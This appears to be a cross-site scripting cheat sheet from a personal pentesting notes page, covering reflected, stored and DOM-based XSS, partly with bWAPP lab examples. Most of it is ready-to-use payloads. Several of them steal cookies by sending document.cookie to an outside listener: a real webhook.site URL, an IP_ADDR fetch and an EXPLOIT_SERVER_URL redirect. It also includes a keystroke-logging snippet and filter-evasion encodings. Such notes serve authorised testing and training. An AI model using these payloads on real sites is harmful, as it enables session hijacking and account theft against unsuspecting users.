[CROSS-SITE SCRIPTING]
GENERAL TECHNIQUES
C1: <script>var i = new Image;i.src="LISTENER URL/?"+document.cookie;</script> SAMPLE: <script>var i = new Image;i.src="https://webhook.site/#!/d88f22e7-9e44-47e8-9508-edeb3406d1cd/?"+document.cookie;</script> NOTE: Do not remove the /? symbols, they allow to use the "document.cookie" as parameter. CASE_1: Sometimes some characters are not allowed and encode techniques are needed, JS accepts decimal unicode characters. If it is still failing [HTTP 403 "maybe"] a quick change is to add zeros to the encoded value, JS will interpret the value as it is. SAMPLE: Let's say, the character ( is not allowed, the decimal unicode value is &#40, so adding extra zeros will look like the following:&#0000000040REFLECTED TECHNIQUES
DESCRIPTION: It is when data is retrieved in the webpage without any restriction. So it can be used to exfiltrate information, stole data, etc. NOTE: -It is important to analyze if exist some code behind performing actions, check if you can analyze the syntax/format to close the query. The following sample is closing two sections of the query, "}]}'; and </script> -Try to add a new header, that will reflect if allows custom headers or not. | bWAPP: <script>alert(1)</script> SAMPLE: </script>var JSONResponseString = '{"movies":[{"response":"test??? Sorry, we don't have that movie :("}]}'; COMMON TESTS: C1: <h1>TEST</h1> C2: <script>alert('XSS');</script> || C1 & C2, NORMAL TEST TO KNOW IF VULNERABILITY EXIST C3: <script>alert(document.cookie);</script> || NORMAL TEST TO RETRIEVE COOKIES C4: <script>fecth('http://IP_ADDR/${btoa(document.cookie)}');</script> || STOLE ENCODED BASE64 COOKIE C5: <script>confirm(document.domain);</script> *for this to work, it is needed a python server or any listener to retrieve the content.
| | | | ::: INTO AN ATTRIBUTE C1: "onmouseover="alert(1) NOTE: As soon as you move the mouse over the vulnerable tag, it will pop-up the alert function. General inspection it's needed, manual review of behavior of input fields. If it is showing input data, how it behaves, what can he imported, etc. ::: INTO AN JAVASCRIPT STRING NOTE: Headers inspection is needed, [burpsuite > repeater]. Analyze the code and what it is doing, if it is receiving via parameters some payloads can be used to escape. C1: '-alert(1)-' ::: INTO AJAX/XML C1: <img src='#' onerror='alert(1)'> ::: EVAL FUNCTION SAMPLE: http://192.168.37.129/bWAPP/xss_eval.php?date=Date() Here it will depends but is only needed to add a script tag into the Date() function. If security if broken, it will pop-up an alert. ::: HREF Here it will depends based on where the HREF is located, however, it is really important to analyze the syntax/format of the query, check if exist some way to close the query to append the XSS command. Also, the referer HTML tag is a good option to test. Check sample, SAMPLE: <td align="center"> <a href=xss_href-3.php?movie=1&name=TEST&action=vote>Vote</a></td> ATTACK: http://192.168.37.129/bWAPP/xss_href-2.php?name=TEST><script>alert('XSS')</script>&action=vote If you check, the HREF is part of a column in a table as it is using the td HTML tag, you can confirm checking where is located the word TEST. So, here you can close the a href tag and append the script tag. This will do a XSS attempt, as the script HTML tag is added. ::: SQLi to XSS SAMPLE: ' or 1=1; <script>alert('TOME')</script> ::: XSS to CSRF It can be reflected or stored.TEST VIA DEV TOOLS
1. Open dev-tools in your browser > go to console. 2. Type: alert(1) | print() | prompt("hello") | | CREATE A LOG FUNCTION TO STORE/RETRIEVE DATA USING XSS step1>$ function logKey(event){console.log(event.key)}
step2>$ document.addEventListener('keydown', logKey)
STORED TECHNIQUES
DESCRIPTION: It is when data (exploit) is stored in the webpage without any restriction. So it can be used to exploit any user that loads the vulnerable page. NOTE: 1. First thing, check if the site allows guest user post or any input post to be stored. 2. Is there any "hidden" fields ? Check if the query can be closed. 3. Check cookies, confirm if there's no "Set-Cookie:" parameters. ::: INTO AN HREF ATTRIBUTE 1. Check how the application behaves when you are providing some input data. [always inspect headers] 2. href attribute can invoke javascript code. SAMPLE: javascript:alert(1) ::: EXTERNAL XSS C2: <script>document.location='//EXPLOIT_SERVER_URL/'+document.cookie</script> NOTE: Payload can be used to retrieve the cookie from external sites.DOM TECHNIQUES
NOTE:NORMAL TESTS
1. <img src=x onerror="prompt(1)"> 2. <img src=x onerror="window.location.href="https://machetevault.github.io/machete""> 3. <svg onload=alert(1)> | DOM for document.write 4. <img src=1 onerror='alert(XSS)'> | DOM for innerHTML 5. <iframe onload=alert(document.domail)> | H1:1901706 | | | |
Inspection of the code is needed 100%, right click > inspect. Look for javascript code that behaves with input information. HTML sinks will retrieve HTML content that with manual inspection you can discover that, however, JS sinks will behave differently, JS debugger is needed. ::: HOW TO KNOW IF DOM-BASED VULNERABILITY EXIST ? One way, is to use the application as expected and open dev tools and inspect the network tab, if there's requests coming and going it means it can be reflected or stored, if not, it could be the chance that it is DOM-BASED. check it! Take a look if exists javascript code that takes data from possible vulnerable sources. [innerHTML / eval()] = sink SOURCE = Javascript properties that allows you to control input. Types: document.URL / document.documentURI / document.URLUnencoded / document.baseURI / window.location / document.cookie / document.referrer / window.name / history.pushState / history.replaceState / localStorage / sessionStorage IndexedDB (mozIndexedDB, webkitIndexedDB, msIndexedDB) / Database / location SINK = Potentially dangerous JavaScript function | [innerHTML / eval()]DOM jQUERY SINKS
1. Inspect the webpage, first identify if exist JS, JQuery code and how it behaves. 2. Try to attempt different tests. SAMPLE: javascript:alert(document.cookie) value?vulnvalue=alert(document.cookie)DOM INSIDE "SELECT" STATEMENT
NOTE: It is needed to use the application as normal to later analyze the headers as it is really important to understand how it works. May exist some parameters that are hidden, etc. Test and looks how it behave. Inspect HTML code. sink:document.write / source:location.search C1: "></select><img%20src=1%20onerror=alert(1)>DOM IN ANGULAR JS
To be added...REFLECTED DOM
NOTES: 1. It is required to use the application as normal user and analyze headers, behavior, etc. 2. It is required to analyze the JS code related to the application. 3. Look for any sink with interesting behavior. 4. Try to input different values when possible, with symbols, numbers, etc and check behavior/responses. SAMPLE: Escaping "\" C1: \"-alert(1)}//STORED DOM
NOTES: 1. It is required to use the application as normal user and analyze headers, behavior, etc. 2. It is a comments section ? Accept guest input values ? C1: <><img src=1 onerror=alert(1)>ENCODED PAYLOADS TECHNIQUES
<script <script>>alert('l33t')</script> <img/src onerror=alert('l33t')> <svg><script>alert('l33t') <svg><script>alert&lpar;'l33t'&rpar; <script>\u0061lert('l33t')</script> <script>eval('\x61lert(\'l33t\')')</script> [NL]eval('\x61lert(\'l33t\')' <script>eval(8680439..toString(30))(983801..toString(36))</script> <h1 onauxclick=confirm(document.domain)>RIGHT CLICK HERE || https://hackerone.com/reports/1779447
©® - Since 2023